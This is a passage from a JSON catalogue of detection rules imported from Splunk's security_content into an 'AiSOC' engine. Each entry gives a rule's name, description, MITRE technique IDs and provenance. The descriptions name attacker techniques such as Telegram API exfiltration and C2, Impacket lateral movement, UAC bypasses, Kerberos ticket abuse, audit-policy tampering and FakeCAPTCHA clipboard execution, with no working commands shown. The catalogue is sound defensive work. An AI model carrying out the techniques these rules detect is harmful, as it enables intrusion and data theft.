} }, { "id": "splunk-security-content-d5f54b38-10bf-4b3a-b6fc-85949862ed50", "type": "detection", "name": "Windows Time Based Evasion via Choice Exec", "description": "The following analytic detects the use of choice.exe in batch files as a delay tactic, a technique observed in SnakeKeylogger malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential time-based evasion techniques used by malware to avoid detection. If confirmed malicious, this behavior could allow attackers to execute code stealthily, delete malicious files, and persist on compromised hosts, making it crucial for SOC analysts to investigate promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-time-based-evasion-via-choice-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d5f54b38-10bf-4b3a-b6fc-85949862ed50", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_time_based_evasion_via_choice_exec.yml" } }, { "id": "splunk-security-content-d61292d5-46e4-49ea-b23b-8049ea70b525", "type": "detection", "name": "MOVEit Certificate Store Access Failure", "description": "This detection identifies potential exploitation attempts of the CVE-2024-5806 vulnerability in Progress MOVEit Transfer. It looks for log entries indicating failures to access the certificate store, which can occur when an attacker attempts to exploit the authentication bypass vulnerability. This behavior is a key indicator of attempts to impersonate valid users without proper credentials. While certificate store access failures can occur during normal operations, an unusual increase in such events, especially from unexpected sources, may indicate malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/moveit-certificate-store-access-failure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d61292d5-46e4-49ea-b23b-8049ea70b525", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/moveit_certificate_store_access_failure.yml" } }, { "id": "splunk-security-content-d62852db-a1f1-40db-a7fc-c3d56fa8bda3", "type": "detection", "name": "Azure AD AzureHound UserAgent Detected", "description": "This detection identifies the presence of the default AzureHound user-agent string within Microsoft Graph Activity logs and NonInteractive SignIn Logs. AzureHound is a tool used for gathering information about Azure Active Directory environments, often employed by security professionals for legitimate auditing purposes. However, it can also be leveraged by malicious actors to perform reconnaissance activities, mapping out the Azure AD infrastructure to identify potential vulnerabilities and targets for further exploitation. Detecting its usage can help in identifying unauthorized access attempts and preemptively mitigating potential security threats to your Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004", "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-azurehound-useragent-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d62852db-a1f1-40db-a7fc-c3d56fa8bda3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_azurehound_useragent_detected.yml" } }, { "id": "splunk-security-content-d6821c0b-fcdc-4c95-a77f-e10752fae41a", "type": "detection", "name": "Adobe ColdFusion Access Control Bypass", "description": "The following analytic detects potential exploitation attempts against Adobe ColdFusion vulnerabilities CVE-2023-29298 and CVE-2023-26360.\nIt monitors requests to specific ColdFusion Administrator endpoints, especially those with an unexpected additional forward slash, using the Web datamodel.\nThis activity is significant for a SOC as it indicates attempts to bypass access controls, which can lead to unauthorized access to ColdFusion administration endpoints.\nIf confirmed malicious, this could result in data theft, brute force attacks, or further exploitation of other vulnerabilities, posing a serious security risk to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/adobe-coldfusion-access-control-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6821c0b-fcdc-4c95-a77f-e10752fae41a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/adobe_coldfusion_access_control_bypass.yml" } }, { "id": "splunk-security-content-d68d8732-6f7e-4ee5-a6eb-737f2b990b91", "type": "detection", "name": "Azure AD Device Code Authentication", "description": "The following analytic identifies Azure Device Code Phishing attacks, which can lead to Azure Account Take-Over (ATO). It leverages Azure AD SignInLogs to detect suspicious authentication requests using the device code authentication protocol. This activity is significant as it indicates potential bypassing of Multi-Factor Authentication (MFA) and Conditional Access Policies (CAPs) through phishing emails. If confirmed malicious, attackers could gain unauthorized access to Azure AD, Exchange mailboxes, and Outlook Web Application (OWA), leading to potential data breaches and unauthorized data access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-device-code-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d68d8732-6f7e-4ee5-a6eb-737f2b990b91", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_device_code_authentication.yml" } }, { "id": "splunk-security-content-d696f622-6b08-4336-b456-696cb5b43ba0", "type": "detection", "name": "Windows Event Logging Service Has Shutdown", "description": "The following analytic detects the shutdown of the Windows Event Log service by leveraging Windows Event ID 1100. This event is logged every time the service stops, including during normal system shutdowns. Monitoring this activity is crucial as it can indicate attempts to cover tracks or disable logging. If confirmed malicious, an attacker could hide their activities, making it difficult to trace their actions and investigate further incidents. Analysts should verify if the shutdown was planned and review other alerts and data sources for additional suspicious behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-logging-service-has-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d696f622-6b08-4336-b456-696cb5b43ba0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_logging_service_has_shutdown.yml" } }, { "id": "splunk-security-content-d6b0d627-d0bf-46b1-936f-c48284767d21", "type": "detection", "name": "Potential Telegram API Request Via CommandLine", "description": "The following analytic detects the presence of \"api.telegram.org\" in the CommandLine of a process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity can be significant as the telegram API has been used as an exfiltration mechanism or even as a C2 channel. If confirmed malicious, this could allow an attacker or malware to exfiltrate data or receive additional C2 instruction, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102.002", "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/potential-telegram-api-request-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6b0d627-d0bf-46b1-936f-c48284767d21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/potential_telegram_api_request_via_commandline.yml" } }, { "id": "splunk-security-content-d6e464e4-5c6a-474e-82d2-aed616a3a492", "type": "detection", "name": "Impacket Lateral Movement WMIExec Commandline Parameters", "description": "The following analytic detects the use of Impacket's `wmiexec.py` tool for lateral movement by identifying specific command-line parameters. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes spawned by `wmiprvse.exe` with command-line patterns indicative of Impacket usage. This activity is significant as Impacket tools are commonly used by adversaries for remote code execution and lateral movement within a network. If confirmed malicious, this could allow attackers to execute arbitrary commands on remote systems, potentially leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003", "T1047", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/impacket-lateral-movement-wmiexec-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6e464e4-5c6a-474e-82d2-aed616a3a492", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/impacket_lateral_movement_wmiexec_commandline_parameters.yml" } }, { "id": "splunk-security-content-d6f2b006-0041-11ec-8885-acde48001122", "type": "detection", "name": "PowerShell 4104 Hunting", "description": "The following analytic identifies suspicious PowerShell execution using Script Block Logging (EventCode 4104). It leverages specific patterns and keywords within the ScriptBlockText field to detect potentially malicious activities. This detection is significant for SOC analysts as PowerShell is commonly used by attackers for various malicious purposes, including code execution, privilege escalation, and persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary commands, exfiltrate data, or maintain long-term access to the compromised system, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-4104-hunting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d6f2b006-0041-11ec-8885-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_4104_hunting.yml" } }, { "id": "splunk-security-content-d71efbf6-da63-11eb-8c6e-acde48001122", "type": "detection", "name": "Sdclt UAC Bypass", "description": "The following analytic detects suspicious modifications to the sdclt.exe registry, a technique often used to bypass User Account Control (UAC). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific registry paths and values associated with sdclt.exe. This activity is significant because UAC bypasses can allow attackers to execute payloads with elevated privileges without user consent. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, and potential persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sdclt-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d71efbf6-da63-11eb-8c6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/sdclt_uac_bypass.yml" } }, { "id": "splunk-security-content-d7297cfa-1f04-4714-bfbe-3679e0666959", "type": "detection", "name": "Windows Office Product Loading Taskschd DLL", "description": "The following analytic detects an Office document creating a scheduled task, either through a macro VBA API or by loading `taskschd.dll`. This detection leverages Sysmon EventCode 7 to identify when Office applications load the `taskschd.dll` file. This activity is significant as it is a common technique used by malicious macro malware to establish persistence or initiate beaconing. If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary commands, or schedule future malicious activities, posing a significant threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-loading-taskschd-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7297cfa-1f04-4714-bfbe-3679e0666959", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_loading_taskschd_dll.yml" } }, { "id": "splunk-security-content-d7369bf5-1315-4138-b927-2dd8bb8c1da7", "type": "detection", "name": "Windows Handle Duplication in Known UAC-Bypass Binaries", "description": "The following analytic detects suspicious handle duplication activity targeting known Windows utilities such as ComputerDefaults.exe, Eventvwr.exe, and others. This technique is commonly used to escalate privileges or bypass UAC by inheriting or injecting elevated tokens or handles. The detection focuses on non-standard use of DuplicateHandle or token duplication where process, thread, or token handles are copied into the context of trusted, signed utilities. Such behavior may indicate attempts to execute with elevated rights without user consent. Alerts enable rapid triage using process trees, handle data, token attributes, command-lines, and binary hashes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-handle-duplication-in-known-uac-bypass-binaries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7369bf5-1315-4138-b927-2dd8bb8c1da7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_handle_duplication_in_known_uac_bypass_binaries.yml" } }, { "id": "splunk-security-content-d77d349e-6269-11ec-9cfe-acde48001122", "type": "detection", "name": "Suspicious Ticket Granting Ticket Request", "description": "The following analytic detects suspicious Kerberos Ticket Granting Ticket (TGT) requests that may indicate exploitation of CVE-2021-42278 and CVE-2021-42287. It leverages Event ID 4781 (account name change) and Event ID 4768 (TGT request) to identify sequences where a newly renamed computer account requests a TGT. This behavior is significant as it could represent an attempt to escalate privileges by impersonating a Domain Controller. If confirmed malicious, this activity could allow attackers to gain elevated access and potentially control over the domain environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-ticket-granting-ticket-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d77d349e-6269-11ec-9cfe-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_ticket_granting_ticket_request.yml" } }, { "id": "splunk-security-content-d7c2c09b-9569-4a9e-a8b6-6a39a99c1d32", "type": "detection", "name": "Windows ISO LNK File Creation", "description": "The following analytic detects the creation of .iso.lnk files in the %USER%\\AppData\\Local\\Temp\\\\ path, indicating that an ISO file has been mounted and accessed. This detection leverages the Endpoint.Filesystem data model, specifically monitoring file creation events in the Windows Recent folder. This activity is significant as it may indicate the delivery and execution of potentially malicious payloads via ISO files. If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.001", "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iso-lnk-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7c2c09b-9569-4a9e-a8b6-6a39a99c1d32", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iso_lnk_file_creation.yml" } }, { "id": "splunk-security-content-d7c6ad22-155c-11ec-bb64-acde48001122", "type": "detection", "name": "Powershell Get LocalGroup Discovery with Script Block Logging", "description": "The following analytic detects the execution of the PowerShell cmdlet `get-localgroup` using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility into script execution. Monitoring this activity is significant as it can indicate an attempt to enumerate local groups, which may be a precursor to privilege escalation or lateral movement. If confirmed malicious, an attacker could gain insights into group memberships, potentially leading to unauthorized access or privilege abuse. Review parallel processes and the entire script block for comprehensive analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-get-localgroup-discovery-with-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7c6ad22-155c-11ec-bb64-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_get_localgroup_discovery_with_script_block_logging.yml" } }, { "id": "splunk-security-content-d7ceffc5-a45e-412b-b9fa-2ba27c284503", "type": "detection", "name": "Local LLM Framework DNS Query", "description": "Detects DNS queries related to local LLM models on endpoints by monitoring Sysmon DNS query events (Event ID 22) for known LLM model domains and services.\nLocal LLM frameworks like Ollama, LM Studio, and GPT4All make DNS calls to repositories such as huggingface.co and ollama.ai for model downloads, updates, and telemetry.\nThese queries can reveal unauthorized AI tool usage or data exfiltration risks on corporate networks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/local-llm-framework-dns-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7ceffc5-a45e-412b-b9fa-2ba27c284503", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/local_llm_framework_dns_query.yml" } }, { "id": "splunk-security-content-d7d1795b-ea18-47e5-9ca6-2c330d052d21", "type": "detection", "name": "Windows Audit Policy Restored via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/restore\" command-line argument used to restore the audit policy from a file. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. Attackers can provide an audit policy file that disables certain or all audit policy configuration. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-restored-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7d1795b-ea18-47e5-9ca6-2c330d052d21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_restored_via_auditpol.yml" } }, { "id": "splunk-security-content-d7fc865e-b8a1-4029-a960-cf4403b821b6", "type": "detection", "name": "Kubernetes Node Port Creation", "description": "The following analytic detects the creation of a Kubernetes NodePort service, which exposes a service to the external network. It identifies this activity by monitoring Kubernetes Audit logs for the creation of NodePort services. This behavior is significant for a SOC as it could allow an attacker to access internal services, posing a threat to the Kubernetes infrastructure's integrity and security. If confirmed malicious, this activity could lead to data breaches, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-node-port-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d7fc865e-b8a1-4029-a960-cf4403b821b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_node_port_creation.yml" } }, { "id": "splunk-security-content-d8120352-3b62-411c-8cb6-7b47584dd5e8", "type": "detection", "name": "Suspicious Process Executed From Container File", "description": "The following analytic identifies a suspicious process executed from within common container/archive file types such as ZIP, ISO, IMG, and others. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it is a common technique used by adversaries to execute scripts or evade defenses. If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1036.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-process-executed-from-container-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8120352-3b62-411c-8cb6-7b47584dd5e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_process_executed_from_container_file.yml" } }, { "id": "splunk-security-content-d8120352-3b62-4e3c-8cb6-7b47584dd5e8", "type": "detection", "name": "Windows Scheduled Task Service Spawned Shell", "description": "The following analytic detects when the Task Scheduler service (\"svchost.exe -k netsvcs -p -s Schedule\") spawns common command line, scripting, or shell execution binaries such as \"powershell.exe\" or \"cmd.exe\".\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships.\nThis activity is significant as attackers often abuse the Task Scheduler for execution and persistence, blending in with legitimate Windows operations.\nIf confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-service-spawned-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8120352-3b62-4e3c-8cb6-7b47584dd5e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_service_spawned_shell.yml" } }, { "id": "splunk-security-content-d81d4d3d-76b5-4f21-ab51-b17d5164c106", "type": "detection", "name": "Windows PowerShell FakeCAPTCHA Clipboard Execution", "description": "This detection identifies potential FakeCAPTCHA/ClickFix clipboard hijacking campaigns by looking for PowerShell execution with hidden window parameters and distinctive strings related to fake CAPTCHA verification. These campaigns use social engineering to trick users into pasting malicious PowerShell commands from their clipboard, typically delivering information stealers or remote access trojans.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.001", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-fakecaptcha-clipboard-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d81d4d3d-76b5-4f21-ab51-b17d5164c106", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_fakecaptcha_clipboard_execution.yml" } }, { "id": "splunk-security-content-d82d4af4-a0bd-11ec-9445-3e22fbd008af", "type": "detection", "name": "Kerberos User Enumeration", "description": "The following analytic detects an unusual number of Kerberos Ticket Granting Ticket (TGT) requests for non-existing users from a single source endpoint. It leverages Event ID 4768 and identifies anomalies using the 3-sigma statistical rule. This behavior is significant as it may indicate an adversary performing a user enumeration attack against Active Directory. If confirmed malicious, the attacker could validate a list of usernames, potentially leading to further attacks such as brute force or credential stuffing, compromising the security of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1589.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-user-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d82d4af4-a0bd-11ec-9445-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_user_enumeration.yml" } }, { "id": "splunk-security-content-d82eced3-b1dc-42ab-859e-a2fc98827359", "type": "detection", "name": "Remote System Discovery with Wmic", "description": "The following analytic detects the execution of `wmic.exe` with specific command-line arguments used to discover remote systems within a domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to map out network resources and Active Directory structures. If confirmed malicious, this behavior could allow attackers to gain situational awareness, identify critical systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-system-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d82eced3-b1dc-42ab-859e-a2fc98827359", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_system_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-d8419343-f0f8-4d8e-91cc-18bb531df87d", "type": "detection", "name": "Windows Identify PowerShell Web Access IIS Pool", "description": "This analytic detects and analyzes PowerShell Web Access (PSWA) usage in Windows environments. It tracks both connection attempts (EventID 4648) and successful logons (EventID 4624) associated with PSWA, providing a comprehensive view of access patterns. The analytic identifies PSWA's operational status, host servers, processes, and connection metrics. It highlights unique target accounts, domains accessed, and verifies logon types. This information is crucial for detecting potential misuse, such as lateral movement, brute force attempts, or unusual access patterns. By offering insights into PSWA activity, it enables security teams to quickly assess and investigate potential security incidents involving this powerful administrative tool.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-identify-powershell-web-access-iis-pool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d8419343-f0f8-4d8e-91cc-18bb531df87d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 